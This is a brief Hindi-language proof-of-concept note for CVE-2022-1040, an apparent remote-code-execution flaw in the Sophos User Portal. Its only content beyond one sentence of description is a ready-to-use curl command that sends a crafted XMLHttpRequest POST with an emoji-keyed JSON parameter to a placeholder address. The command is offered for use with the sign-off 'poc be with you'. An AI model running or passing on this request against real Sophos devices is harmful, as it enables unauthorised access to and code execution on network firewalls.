
CVE-2022-1040 के लिए प्रमाण-की-अवधारणा शोषण जो Sophos User Portal को एक क्राफ्टेड XMLHttpRequest POST के साथ लक्षित करता है ताकि दूरस्थ कोड निष्पादन को ट्रिगर किया जा सके।
poc आपके साथ हो
curl --insecure -H "X-Requested-With: XMLHttpRequest" -X POST 'https://x.x.x.x/userportal/Controller?mode=8700&operation=1&datagrid=179&json=\{"🦞":"test"\}'